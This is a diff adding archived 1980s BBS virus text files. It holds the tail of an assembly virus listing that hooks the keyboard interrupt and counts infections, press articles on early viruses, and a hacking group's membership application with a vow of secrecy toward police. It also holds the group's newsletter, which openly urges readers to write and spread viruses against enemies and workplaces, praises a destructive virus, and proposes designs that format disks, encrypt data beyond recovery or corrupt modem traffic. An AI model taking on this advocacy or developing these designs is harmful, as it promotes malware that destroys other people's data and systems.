CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 + +Downloaded From P-80 International Information Systems 304-744-2253 +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + There's A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. Since the +first tests of the notion in 1983 that machines can catch and spread +"information diseases," the computer world has reached the point at which as +many as thirty instances of "computer virus" have been reported in the past +year, affecting tens of thousands of U.S. computers alone. + + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the world's largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by it's author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. + + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this year's only such +day. + + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machines' users to follow routine computer +hygiene: Don't trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + "The only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers," says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +"Vaccine," "Flu Shot," "Data Physician," "Syringe." + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + "What we are dealing with here is the fabric of trust in society," says +Murray. "With computer viruses, we have a big vulnerability." + + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. On March 2, the virus interrupted users +by flashing this message on their screens: + + "Richard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the "Trojan horse," a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the "time bomb," which +explodes at a set time, and the "logic bomb," which goes off when the +computer arrives at a certain result during normal computation. The "salami +attack" executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The "scores" virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. "It looks + as if it searching for a particular Macintosh program with a name that + no one recognizes," spokesman Charles Redmond says. + + This virus, still spreading, has reached computers in Congress' + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer Incorporated's government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer "bulletin boards" where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The "brain" virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like "scores," it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The "Christmas" virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiver's computer to display the + greeting, then secretly send the virus and message to everyone on the + recipient's regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke down within hours + when the message began multiplying, stuffing the computers' memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. + + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term "computer Viruses." A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. + + This, however, "allows the least trusted user to write a program that +can be used by everyone" and is "very dangerous," he says. + + Computers "are all at risk," says Cohen, "and will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence." + + +1.) Computer "viruses" are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: "bulletin boards" where anyone can copy them + for personal use. + +4.) A computer receiving the programs will "read" the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computer's clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + 'Virus' infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + "It definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely," said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + "This was information we were using to base diagnoses on," said Juni, who +reported the case in a letter in The New England Journal of Medicine. "We were +lucky and caught it in time." + + A computer virus is a set of instructions designed to reproduce and spread +from computer to computer. Some viruses do damage in the process, such as +destroying files or overloading computers. + + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. + + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + "Prosecutor Wins Conviction In Computer Data Destruction" + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer "virus" in his employer's system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. + + Tarrant County Assistant District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a "virus." + + "We've had people stealing through computers, but not this type of case," +McCown said. "The basis for this offense is deletion." + + "It's very rare that the people who spread the viruses are caught," said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. + + "This is absolutely the first time" for a conviction, McAfee said. + + "In the past, prosecutors have stayed away from this kind of case because +they're too hard to prove," McCown said yesterday. They have also been reluctant +because the victim doesn't want to let anyone know there has been a breach of +security." + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the state's 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. + + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + "There were a series of programs built into the system as early as Labor +Day (1985)," McCown said. "Once he got fired, those programs went off." + + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + +Downloaded From P-80 International Information Systems 304-744-2253 + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + Do You Crack Regularly : + Ever Made A Virus/Trojan : + Major Accomplishments : + : + +INTERVIEW +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name any or the founders of CPI? +: +: +: +: + +Have you considered the distribuition of Viruses/Trojans as a "crime"? Why +or why not? Have you ever considered the consequences that could result +from the acts of releasing a Virus/Trojan? (morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +What would you consider yourself if you were admitted into CPI, a programmer, +a phreaker, a distributor, a information gatherer, or a vegetable? +: +: +: +: + +Why would you ever want to release or aid in releasing a potential virus/trojan +to the public? +: +: +: +: + +Can you contribute to CPI? How? +:(do you have access to info concerning virus/trojans) +:(exceptional programmer?) +:(got connections?) +:(anything extraordinary?) + + +OATH +----------------------------------------------------------------------------- +Typing your name at the bottom of the following paragraph is the same as +signing your name on an official document. + +authorities - As stated in the document below, the term authorities shall + be defined as any law enforcement agency or any agency that + is/may be affiliated with any law enforcement agency. Also, + this includes any company or agency or person which is/may + be involved with the telephone company or any telephone-type + of service(s). + +I [your name here] do solemnly swear never to report neither to my peers nor +the authorities the actions and duties performed by this group, Corrupted +Programming International, on any account. Also, I realize that if I leave +CPI and am no longer a member of CPI, it is my duty, as signed below, to uphold +the greatest confidence of CPI's activities, and I agree that any information I +may report to any one or any thing CANNOT be used against CPI and its members +in a court of law. I fully understand that if I were to become affiliated with +the authorities that it would be my duty to remove myself from any membership +if my position presented itself as contradictory towards the group, CPI and its +members. I also comprehend that if I were to be confronted by the authorities, +it my duty as a CPI member, as signed below, is to never disclose or discuss +CPI's activities to them; however, if I do, I fully agree that the information +disclosed or discussed cannot then be used against CPI or any member(s) of CPI +in a court of law. I further agree that all the terms and restrictions as noted +above also correspond to the entire group of WCCA, West Coast Corrupted +Allegiance. + +Typed:____________________ + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Upload ALL Applications To The WCCA Headquarters BBS + + T H E A N D R O M E D A S T R A I N + + * 619-566-7093 * 1200/2400 * 24 HRS * + + + _______________________<==| CURRENT WCCA NODES |==>_________________________ + /--------------+------------------------------------+-----------------+------\ + | Phone Number | Node Name | Sysop | Baud | + +--------------+------------------------------------+-----------------+------+ + | 619-484-3508 | The Phrozen Phorest | Ancient Mariner | 1200 | + \--------------+------------------------------------+-----------------+------/ + + Future WCCA Support BBS's Will Be Active - Applications May Be Turned In Then + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/cpivirus.txt b/textfiles.com/virus/cpivirus.txt new file mode 100644 index 00000000..a1d6c6d9 --- /dev/null +++ b/textfiles.com/virus/cpivirus.txt @@ -0,0 +1,457 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 27, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, VRI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). + + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Doctor Dissector + CPICV Editor/ANE Author + + + Table Of Contents- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.7 CPI Application..........................Doctor Dissector + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). + These things are covered in the following section. + + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. + It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). + + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. + + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. + + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, VRI, hope that you will share your information and comments + with us at VRI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for VRI, send us + an application today. + + Oh yeah, if this happens to be the only issue of VRICV, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). Until our (my?) next issue, have phun and don't get + toooo wild...... + + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + [1.7] CPI Application + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNANATIONAL<< + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionairre. Please answer the following completely + and to the best of your ability. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your REAL FULL NAME : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your City & State : + Your Age : + Occupation/Grade : + Place Of Employment : + Work Phone Number : + Your Interests And Hobbies : + +Is Your Job IN ANY WAY Related To ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI, Sheriff, Police) +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Elite References : + Computers You Have Used : + Computer You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Alot : + Have You Ever Hacked : + Do You Hack Alot : + Have You Ever Cracked : + Do You Crack Alot : + Ever Made A Virus/Trojan : + Major Accomplishments : + + +MISC INFORMATION +----------------------------------------------------------------------------- +Answer In 4 Lines Or Less: + + +What do you think Corrupted Programming International is? +: +: +: +: + +When did you first hear about CPI? +: +: +: +: + +Why do you want to be a member of CPI? +: +: +: +: + +Do you know any of the members of CPI? Can you name a few? +: +: +: +: + +Have you considered the distribuition of viruses/trojans as a "crime"? Why +or why not? (Morally speaking?) +: +: +: +: + +Have you written any text files? (On any underground type of subject?) +: +: +: +: + +Are you a member of any other group(s)? Can you name them and their HQ BBS? +: +: +: +: + +Can you contribute to CPI? How? +:(Do you have access to info concerning virus/trojans) 